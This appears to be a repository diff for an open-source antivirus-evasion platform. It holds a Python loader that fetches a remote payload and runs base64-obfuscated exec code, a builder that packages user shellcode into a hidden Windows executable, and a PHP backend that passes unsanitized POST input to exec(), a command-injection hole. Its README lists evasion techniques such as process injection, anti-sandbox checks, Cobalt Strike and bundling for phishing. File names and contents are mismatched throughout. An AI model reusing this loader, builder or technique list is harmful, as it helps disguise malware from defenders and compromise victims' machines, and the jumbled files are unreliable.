V1.0

让更多的人了解免杀平台其实没那么难写

Author: admin360bug

Bypass/360SB.ico

@@ -0,0 +1,14 @@
+import ctypes
+import requests
+import base64
+
+url="Null"
+
+headers = {
+    'User-Agent': "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
+}
+requests.packages.urllib3.disable_warnings()
+s = requests.get(base64.b64decode(url),headers=headers,verify=False)
+s = bytearray(s.content)
+
+eval(base64.b64decode("ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHNoZWxsKSk="))

Bypass/Bypass.py

@@ -0,0 +1,57 @@
+# -*- coding: UTF-8 -*-
+import sys,os,re,base64,json
+import shutil
+
+Shellcode = sys.argv[1] # 接受传递过来的shellcode
+Name = sys.argv[2] # 接受传递过来的Name
+ShellName =  Name+".py"
+old_str = "Null"
+
+os.chdir('./Bypass')
+
+def Start():
+    if os.path.exists(Name) == False: #判断路径是否存在 ， 不然就创建
+        os.mkdir(Name)
+  
+    pyfile = "./"+ Name +"/" + ShellName #新Python文件路径
+    
+    shutil.copy("./Bypass.py",pyfile) #将当前bypass copy 过去
+    Fileif = os.path.exists(pyfile)
+
+        
+    if Fileif == True:
+        new_str =  base64.b64encode(Shellcode.encode('utf-8')).decode("utf-8")
+        writeFile(pyfile,old_str,new_str)
+    else:
+        print("文件不存在,检查原文件。")
+
+
+
+def writeFile(file,old_str,new_str):
+
+    with open(file, "r", encoding="utf-8") as f1,open("%s.bak" % file, "w", encoding="utf-8") as f2:
+        for line in f1:
+            f2.write(re.sub(old_str,new_str,line))
+    os.remove(file)
+    os.rename("%s.bak" % file, file)
+    Exp()
+
+def Exp():
+    Dir = ".\\" + Name
+
+
+# pyinstaller -F -w -i 360SB.ico P.py -o Name
+# os.system("cd " + Dir + "&&" + "pyinstaller -F -w -i ./360SB.ico " + path)
+
+    os.system("cd " + Dir + "&&" + "pyinstaller -F -w -i ../360SB.ico " + ShellName + "  --distpath=../../build")
+    buildpath = "../build/"+Name+".exe"
+
+    if os.path.exists(buildpath) == True:
+        E_ok =json.dumps("success")
+        print(E_ok)
+    else:
+        E_bad =json.dumps("failure")
+        print(E_bad)
+
+if __name__ == "__main__":
+    Start()

Bypass/Input.py

@@ -0,0 +1,132 @@
+# 开普勒星云免杀平台开源版V1.0
+
+
+
+## 0x00写在开源之前：
+
+#### 	目前，在线的免杀的平台层出不穷，不少人可能会一些免杀的脚本编写，但是想要GUI化部署到Web服务器中，因为不会写Web这方面的代码，所以搁置。
+
+#### 	虽然，本身一开始是想说，搭建一套完整的免杀平台上线的，但奈何个人时间有限，要处理的事情非常非常多，团队的师傅也都在忙其他事情，实在无心把这个平台写完，又本着授人以鱼不如授人以渔的想法。所以，便把之前在7月份写的demo分享出来，交给有缘人依附于我们的这个demo往下写。
+
+#### 	其实实现这方面的GUI化非常简单，很多师傅只是懒得写这么一个框架而已，使用者可以根据我们的开发思路往下延申。
+
+
+
+## 0x01界面：
+
+![](./img/1.png)
+
+## 0x02主要实现的核心代码：
+
+
+
+```
+<?php
+
+$shellcode = $_POST['shellcode'] ?? null;
+
+if (empty($shellcode)||$_SERVER['REQUEST_METHOD'] != 'POST') {
+    header('HTTP/1.1 400 Bad Request');            //返回Http错误码
+    echo json_encode(['success' => 'false']);  //返回错误信息
+    return false;
+}
+
+
+    // $url = "https://service-5369sd4f-1258472441.sh.apigw.tencentcs.com/bootstrap-2.min.js";
+
+    global $name,$path,$file_name;
+    $name = md5(time()+$shellcode+base64_decode($shellcode));
+    $file_name = $name.".exe";
+    $file_dir = "./build/";        //下载文件存放目录    
+    $path = $file_dir . $file_name;
+
+    $shellcode = sprintf("python ./Bypass/Input.py %s %s",$shellcode,$name);
+
+    exec($shellcode,$result);
+    $execResult =  $result[2];
+    exec_callback($shellcode, 'download'); 
+    
+    function exec_callback($command, $callback){ 
+        global $file_name;
+        $array = array(); 
+        exec($command, $array, $ret); 
+        if(!empty($array)){ 
+            foreach ($array as $line){ 
+                call_user_func($callback, $line); 
+            } 
+        } 
+    } 
+    
+    function download($line){
+        global $name,$path;
+        if($line == "success"){
+            echo "ok";
+            return;
+        }
+        if (! file_exists ( $path )) {    
+            header('HTTP/1.1 404 NOT FOUND');  
+        } else {
+            $file = fopen ( $path, "rb" ); 
+            Header ( "Content-type: application/octet-stream" ); 
+            Header ( "Accept-Ranges: bytes" );  
+            Header ( "Accept-Length: " . filesize ( $path ) );  
+            header('Content-Disposition: attachment; filename="'.$name.'.exe"');
+            echo fread ( $file, filesize ( $path ) );    
+            fclose ( $file );    
+            exit ();    
+
+       }  
+    }
+```
+
+## 0x03一些免杀思路分享：
+
+#### 以下内容教程将与我本人的Web安全系列课程一同发布，敬请期待！
+
+
+
+#### AES + XOR +魔改base64加密的 shellcode（减小程序熵值）
+
+#### Shellcode拆分（多端交叉加载）
+
+#### LSB隐写（远端下载shellcode防止查杀）
+
+#### APC 进程注入 (从任意父进程执行恶意进程)
+
+#### 随机生成的 AES 密钥和 iv（每次都是新的hash）
+
+#### 资源修改（减小用户怀疑）
+
+#### 内存休眠（避免敏感操作）
+
+#### Syscall（防止杀软hook敏感api）
+
+#### 动态修改自身（云查杀）
+
+#### 杀免分离（自启+快速下线）
+
+#### Mainifest（UAC）
+
+#### 二次开发的Cobalt Strike（修复烂大街的特征）
+
+#### 流量加密（对抗流量分析）
+
+#### 内存加密（卡巴斯基内存扫描）
+
+#### 反沙盒（检测内存+硬盘大小+有无U盘插拔记录）
+
+#### 反调试（自己调试自己）
+
+#### 捆绑（增加钓鱼成功率）
+
+#### CDN（保护C2服务器）
+
+
+
+## PS：感谢名单
+
+#### Leeda、蒋神、饿猫、Alan知识星球用户
+
+#### 如果有更好的思路和衍生版本，可发送邮件至admin@360bug.net
+
+#### 让更多的人了解免杀平台其实没那么难写~

README.md

@@ -0,0 +1,59 @@
+<?php
+
+$shellcode = $_POST['shellcode'] ?? null;
+
+if (empty($shellcode)||$_SERVER['REQUEST_METHOD'] != 'POST') {
+    header('HTTP/1.1 400 Bad Request');            //返回Http错误码
+    echo json_encode(['success' => 'false']);  //返回错误信息
+    return false;
+}
+
+
+    // $url = "https://service-5369sd4f-1258472441.sh.apigw.tencentcs.com/bootstrap-2.min.js";
+
+    global $name,$path,$file_name;
+    $name = md5(time()+$shellcode+base64_decode($shellcode));
+    $file_name = $name.".exe";
+    $file_dir = "./build/";        //下载文件存放目录    
+    $path = $file_dir . $file_name;
+
+    $shellcode = sprintf("python ./Bypass/Input.py %s %s",$shellcode,$name);
+
+    exec($shellcode,$result);
+    $execResult =  $result[2];
+    exec_callback($shellcode, 'download'); 
+    
+    function exec_callback($command, $callback){ 
+        global $file_name;
+        $array = array(); 
+        exec($command, $array, $ret); 
+        if(!empty($array)){ 
+            foreach ($array as $line){ 
+                call_user_func($callback, $line); 
+            } 
+        } 
+    } 
+    
+    function download($line){
+        global $name,$path;
+        if($line == "success"){
+            echo "ok";
+            return;
+        }
+        if (! file_exists ( $path )) {    
+            header('HTTP/1.1 404 NOT FOUND');  
+        } else {
+            $file = fopen ( $path, "rb" ); 
+            Header ( "Content-type: application/octet-stream" ); 
+            Header ( "Accept-Ranges: bytes" );  
+            Header ( "Accept-Length: " . filesize ( $path ) );  
+            header('Content-Disposition: attachment; filename="'.$name.'.exe"');
+            echo fread ( $file, filesize ( $path ) );    
+            fclose ( $file );    
+            exit ();    
+
+       }  
+    }
+
+
+

action.php

@@ -0,0 +1,91 @@
+<!DOCTYPE html>
+<html lang="zh_cn">
+<head>
+    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> 
+    <title>开普勒星云免杀平台开源版</title> 
+    <meta name="viewport" content="width=device-width, initial-scale=1" /> 
+    <meta http-equiv="X-UA-Compatible" content="IE=edge" /> 
+    <link rel="stylesheet" type="text/css" href="./res/bootstrap.min.css" /> 
+    <link rel="stylesheet" type="text/css" href="./res/index.css" /> 
+ </head>
+ <body> 
+  <div class="body-particles"> 
+    <nav class="navbar navbar-expand-lg navbar-dark bg-primary"> 
+            <div class="container"> 
+                <a class="navbar-brand" href="/">
+                    <img src="./images/logo.png" class="logo">
+                </a> 
+            </div> 
+    </nav> 
+   <div class="d-md-none" style="margin-top:10px;"></div> 
+   <div class="container top"> 
+    <div class="card"> 
+     <div class="card-header bg-primary text-white">
+         <h1>开普勒星云免杀平台开源版</h1>
+    </div> 
+     <div class="card-body"> 
+      <form action="action.php" method="post" accept-charset="utf-8" enctype="multipart/form-data"> 
+        <div class="form-group">
+            <span>选择提交免杀模式：</span>
+            <div class="form-check-inline">
+                <input class="form-check-input" type="radio" name="mode" id="mode-code" value="shellcode" checked=checked required>
+                <label class="form-check-label" for="mode-code">ShellCode</label>
+            </div>
+            <div class="form-check-inline">
+                <input class="form-check-input" type="radio" name="mode" id="mode-file" value="file" required>
+                <label class="form-check-label" for="mode-file">文件</label>
+            </div>
+        </div>
+       <div class="form-group"> 
+           <div id="file-input" class="visible">
+                <label class="form-control" for="picker-input" id="uploads-file">
+                    <div class="cloud"></div>
+                    <p class="input-message">拖放文件至此处</p> 
+                    <input id="picker-input" type="file" multiple="" accept="" class="picker-input" name="file"/> 
+                </label>
+           </div>
+           <div id="code-input">
+                <input class="form-control pl-3" placeholder="请输入ShellCode..." name="shellcode"/> 
+           </div>
+           <div id="uploading" style="display: none;">
+                <div class="svg"></div>
+           </div>
+
+       </div>  
+       <div class="text-center"> 
+        <button type="submit" class="px-4 btn btn-primary" id="tijiao">生成</button> 
+       </div>
+      </form>
+     </div> 
+    </div> 
+    <div class="mt-5"></div> 
+    <div class="card"> 
+     <div class="card-header bg-primary text-white" align="center"> 
+      <h4>免责声明</h4> 
+     </div> 
+     <div class="card-body"> 
+      <p>免杀全称为反杀毒技术(Anti Anti- Virus)简称免杀，是一种能够使病毒木马等文件免于被杀毒软件查杀的技术。</p> 
+      <p>本站(开普勒星云免杀平台)所有功能及数据仅可用于信息安全评估,严禁用于任何非法用途,如有违反任何法律本站不承担任何责任。</p>
+     </div> 
+    </div> 
+   </div>
+  </div> 
+  <div id="particles"></div> 
+  <script src="res/jquery-1.8.3.min.js"></script>
+  </div>
+  <script>
+    //   var input = document.getElementById("picker-input");
+    //   input.addEventListener('change', (event) => {
+    //     const result = document.querySelector('.input-message');
+    //     result.textContent = `已上传：${event.target.value}`;
+    //  });
+    $(document).ready(function(){
+        $("form").submit(function(e){
+            $("#code-input").hide();
+            $("#tijiao").hide();
+            $("#uploading").show();
+        });
+    });
+   </script>   
+ </body>
+</html>

build/5624a6e34220240c2886d3ec72e82b1d.exe

@@ -0,0 +1,15 @@
+import ctypes
+import requests
+import base64
+
+url="Null"
+
+headers = {
+    'User-Agent': "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
+}
+requests.packages.urllib3.disable_warnings()
+s = requests.get(base64.b64decode(url),headers=headers,verify=False)
+s = bytearray(s.content)
+
+
+eval(base64.b64decode("ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHNoZWxsKSk="))